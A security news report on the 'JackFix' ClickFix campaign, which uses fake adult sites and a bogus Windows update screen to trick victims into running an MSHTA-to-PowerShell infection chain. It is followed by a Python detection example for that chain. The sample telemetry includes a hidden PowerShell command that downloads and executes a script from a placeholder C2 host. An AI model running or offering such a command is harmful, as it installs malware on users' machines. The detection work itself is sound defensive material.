A new cyberattack campaign is gaining attention for its sophisticated use of fake adult websites and ClickFix-style deception to compromise user systems. The campaign employs clones of popular adult sites like xHamster and PornHub as its phishing delivery mechanism, often distributed through malvertising. According to a report by Acronis, the controversial nature of the adult theme and the possible connection to “shady websites” intensify the psychological pressure on victims, making them more likely to comply swiftly when a supposed “critical security update” suddenly demands installation. This tactic capitalizes on the overall surge in ClickFix attacks over the past year, in which users are prompted to execute malicious commands on their own machines under the pretense of technical fixes or security checks; Microsoft data shows ClickFix is now the most common initial access method, accounting for 47% of all attacks.
The latest iteration of this attack, which the Singapore-based cybersecurity firm Acronis has codenamed JackFix, distinguishes itself by employing highly convincing fake Windows update screens instead of more traditional robot-check lures. Perhaps the most alarming aspect of this attack is how the phony Windows update alert is designed to hijack the victim’s experience. The full-screen alert provides explicit instructions: the victim is told to open the Windows Run dialog box, press the Ctrl + V key combination, and then hit Enter, thereby triggering the immediate infection sequence by manually pasting and executing malicious code. This shift from robot-checks to a near-total screen takeover and manual command execution indicates an evolution in how attackers are seeking to bypass technical defenses and leverage user compliance.
It is assessed that the starting point for victims is redirection, likely via malvertising or various social engineering schemes, to one of these fake adult sites. Upon interacting with any element on the phishing site, the victim is suddenly served the “urgent security update” notification. Security researcher Eliad Kimhy explained that the fake Windows Update screen is constructed entirely using HTML and JavaScript code, immediately attempting to go full screen and displaying a remarkably convincing window with a blue background and white text, deliberately reminiscent of Windows’ infamous Blue Screen of Death. Some versions of these malicious sites have been found to contain developer comments written in Russian, which suggests the possibility of a Russian-speaking threat actor being behind the campaign.
The attack heavily relies on layers of obfuscation to conceal the underlying ClickFix-related code from security analysis. Furthermore, the malicious page attempts to block victims from escaping the full-screen alert by disabling common escape mechanisms, specifically the Escape and F11 keys, as well as the F5 and F12 keys, which are often used by security professionals for page reloading and inspection. Despite this attempt at lockdown, the researchers discovered a flaw in the logic of the code that still allows users to dismiss the full-screen view with the Escape and F11 keys. The initial command that the victim is tricked into running is an MSHTA payload.
This MSHTA payload is executed using the legitimate mshta.exe binary and contains JavaScript designed to execute a PowerShell command. This first PowerShell command is merely a fetch mechanism, designed to retrieve a secondary, more potent PowerShell script from a remote server. To further hinder simple analysis, the command and control domains used in the attack are set up to redirect any user who navigates to them directly, such as a security analyst, to a benign site like Google or Steam. Acronis noted that the malicious site only responds with the correct infection code when it is specifically accessed via an irm (Invoke-RestMethod) or iwr (Invoke-WebRequest) PowerShell command, thereby creating a crucial extra layer of obfuscation and analysis prevention for the threat actors.
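The process chain the report describes (Run dialog, then mshta.exe, then a PowerShell fetch via irm or iwr) leaves a recognizable parent-child pattern in endpoint process-creation telemetry. The following is an added detection example, not code from Acronis or the report; the event field names, process IDs, paths and the stage-two URL are constructed placeholders.

```python
import re
from dataclasses import dataclass

# Chain described above: pasted Run-dialog command -> mshta.exe -> PowerShell -> irm/iwr fetch.
FETCH_CMDLETS = re.compile(r"\b(irm|iwr|invoke-restmethod|invoke-webrequest)\b", re.I)

@dataclass
class ProcEvent:
    """One process-creation record; field names are assumed, not a vendor schema."""
    pid: int
    ppid: int
    image: str     # full path of the started executable
    cmdline: str   # command line as logged

def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]

def event_reasons(ev: ProcEvent, by_pid: dict) -> list:
    """Return the indicators this event matches (empty list if none)."""
    reasons = []
    name = _basename(ev.image)
    parent = by_pid.get(ev.ppid)
    parent_name = _basename(parent.image) if parent else ""
    if name == "mshta.exe" and parent_name == "explorer.exe":
        reasons.append("mshta.exe started from the user shell (Run dialog)")
    if name == "powershell.exe":
        if parent_name == "mshta.exe":
            reasons.append("powershell.exe launched by mshta.exe")
        if FETCH_CMDLETS.search(ev.cmdline):
            reasons.append("PowerShell fetches remote content with irm/iwr")
    return reasons

def find_clickfix_chains(events: list) -> dict:
    """Map pid -> reasons for every event matching at least one indicator."""
    by_pid = {e.pid: e for e in events}
    hits = {}
    for ev in events:
        reasons = event_reasons(ev, by_pid)
        if reasons:
            hits[ev.pid] = reasons
    return hits

# Constructed sample telemetry (not real logs); pids and the stage-two URL are placeholders.
SAMPLE_EVENTS = [
    ProcEvent(1000, 900, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(1100, 1000, r"C:\Windows\System32\mshta.exe", "mshta.exe javascript:<lure elided>"),
    ProcEvent(1200, 1100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell -w hidden -c "irm http://c2.example.invalid/s2 | iex"'),
    ProcEvent(1300, 1000, r"C:\Windows\System32\notepad.exe", "notepad.exe"),
]
```

Running find_clickfix_chains over the sample flags the mshta.exe and powershell.exe events and leaves the benign notepad.exe launch alone; in production the same logic would read real process-creation events rather than the constructed list.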